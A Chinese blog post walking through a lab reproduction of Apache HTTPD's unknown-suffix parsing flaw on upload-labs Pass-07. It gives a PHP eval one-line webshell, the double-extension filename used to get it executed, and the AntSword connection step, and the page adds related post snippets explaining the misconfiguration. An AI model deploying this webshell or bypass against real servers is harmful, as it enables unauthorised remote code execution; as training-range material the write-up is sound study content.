【漏洞复现】Apache_HTTPD_未知后缀名解析

于 2023-11-04 18:05:30 发布
阅读量263 收藏
点赞数
分类专栏: # 漏洞复现 文章标签: upload-labs靶场 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/134221336
版权

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

upload-labs/Pass-07

上传1.php文件

<?php @eval($_REQUEST[6868]);phpinfo();?>

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

访问/upload/1.php.jaychou

在这里插入图片描述

蚁剑连接

在这里插入图片描述

过期的秋刀鱼-
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
apache_httpd_role:安装Apache HTTP服务器的角色
05-01
Apache HTTP Server Ansible角色 这个Ansible角色在Debian环境中安装Apache HTTP服务器。...- src : idealista.apache_httpd_role version : 3.0.0 name : apache_httpd 使用ansible-galaxy命令安装角色: ans
apache_httpd-2.2.15-win32-x86-openssl-0.9.8m-r2.msi-PHP代码类资源
08-30
配置Apache服务器时的安装文件,很难找到, PHP开发必备 配置Apache服务器时的安装文件,很难找到, PHP开发必备
apache-httpd_未知后缀名解析漏洞
acdcccc的博客
09-07 120
Apache Httpd 多后缀名解析漏洞复现
不安全的配置导致apache未知后缀名解析漏洞分析
qq_43571759的博客
04-26 1046
Apache HTTPD不安全的配置导致未知后缀解析漏洞 该环境版本: PHP 7.x 最新版 Apache HTTPD 2.4.10 稳定版(来自debian源) 由此可知,该漏洞Apache、php版本无关,属于用户配置不当造成的解析漏洞漏洞分析 图中的配置文件中高亮部分也是此漏洞的关键所在 <FilesMatch ".+\.ph(p[345]?|t|tml)$"> S...
Apache后缀解析漏洞
m0_65150886的博客
10-19 181
apache支持php有多种模式,常见的有module、cgi、fastcgi等,此漏洞存在于module模式(关于CGI、FastCGI、PHP-FPM与Module模式传送门)。Apache在遇到多个后缀的文件时,尝试从后往前解析,直到解析到可解析的为止。例如test.php.xxx就按照php去解析,test.php.aaa.jpg就按照php去解析。根据这个原理,我们可以上传文件名如shell.php.xxx的文件,以此来绕过后端黑名单的检测,从而上传成功而且又能被Apache按照php去解析
生命在于学习——文件解析
易水哲的博客
08-26 1311
文件解析漏洞
Apache后缀解析漏洞复现apache_parsing_vulnerability)
爱吃仡坨的Blog
10-13 2094
apahe解析文件时候有一特性,Apache默认一个文件可以有多个以点分割的后缀apache会从最右边开始识别其后缀名,如遇无法识别的后缀名则依次往左进行识别如果运维人员给.php后缀的文件添加了处理程序 `AddHandler application/x-httpd-php .php` 那么在有多个后缀的情况下,只要文件含有.php后缀那么该文件就会被识别为PHP文件进行解析。该漏洞apache版本和php版本无关,属于用户配置不当造成的解析漏洞,
Apache HTTPD 未知后缀解析漏洞
weixin_45022281的博客
10-13 1350
Apache HTTPD 换行解析漏洞(CVE-2017-15715) 漏洞描述: Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。 风险等级: 高 影响版本: 2.4.0~2.4.29 漏洞复现: [1] 先尝试上传一个PHP文件进行抓包 [2] 上传抓包修改hex,在70后面修改成0a [3] 上传文件,访问测试(访问时需要
vulhub Apache HTTPD未知后缀解析漏洞
qq_61774705的博客
04-25 424
漏洞原理: Apache HTTPD 支持一个文件拥有多个后缀,并为不同后缀执行不同的指令。比如,如下配置文件: AddType text/html .html AddLanguage zh-CN .cn 其给.html后缀增加了media-type,值为text/html;给.cn后缀增加了语言,值为zh-CN。此时,如果用户请求文件index.cn.html,他将返回一个中文的html页面。 以上就是Apache后缀的特性。如果运维人员给.php后缀增加了处理器: AddHandle..
Apache HTTPD 多后缀名解析漏洞复现
qq_45953122的博客
09-08 662
后缀名解析漏洞(Multiple Extension Handling Vulnerability)指的是一种安全漏洞,发生在某些操作系统或网络服务中的文件扩展名处理机制中。 这种漏洞的本质是当文件具有多个后缀名(例如file.txt.php)时,系统或服务可能会错误地解析文件的类型和处理方式。攻击者可以利用这个漏洞来绕过安全检查,欺骗系统或服务执行不应该执行的操作。
svn_httpd_subversion.rar_httpd s
09-19
svn http安装程序及安装教程详解。 svn http安装程序及安装教程详解。
mini_httpd.rar_Linux cgi_httpd cgi_linux 服务器_mini httpd_mini_h
07-14
UNIX/Linux平台上的微型http服务器,实现网页浏览,cgi接口,php页面查看等功能
LGK160I(2T4T).pdf
06-20
LGK160I(2T4T).pdf
小波神经网络MATLAB仿真模拟源程序
06-20
小波神经网络MATLAB仿真模拟源程序 人工智能学习 MATLAB小波神经网络仿真模拟程序
tensorflow-gpu-2.8.2-cp37-cp37m-win-amd64.whl
06-20
format在python中的用法
PyOpenGL-3.1.6-cp310-cp310-win-amd64.whl
06-20
PyOpenGL-3.1.6-cp310-cp310-win_amd64.whl,之前的下载PyOpenGL网页消失了。
java图形图象处理(论文模板+系统).zip
06-20
标题中有的内容,压缩包中就有,适用于各位学子在完成大作业、课题、毕设时进行参考。 这些项目来自国内外大神提供,可以作为毕业设计的项目参考,也可以作为大作业项目参考,如果需要对项目进行修改,需要具备一定基础知识。 注意:如果装有360等杀毒软件,可能会出现误报的情况,源码本身并无病毒,使用源码时可以关闭360,或者添加信任。 注意:所有文件只提供参考作用,严禁抄袭、照搬
pyzmq-25.0.0-cp311-cp311-win32.whl
最新发布
06-20
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
CYG_HTTPD_HANDLER_TABLE_ENTRY宏的原型
05-30
`CYG_HTTPD_HANDLER_TABLE_ENTRY` 是一个宏,用于定义 HTTPd 服务器的请求处理函数。其原型如下: ```c #define CYG_HTTPD_HANDLER_TABLE_ENTRY(uri, method, handler, arg) \ { uri, method, handler, arg } ``` 其中,`uri` 是字符串类型,表示请求的 URI;`method` 是字符串类型,表示请求的 HTTP 方法;`handler` 是函数指针类型,指向处理该请求的函数;`arg` 是一个指针类型,指向传递给处理函数的参数。 这个宏的作用是简化定义 HTTPd 请求处理函数的工作,也使得 HTTPd 服务器的请求处理函数可以以表的形式组织起来,方便管理和查找。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值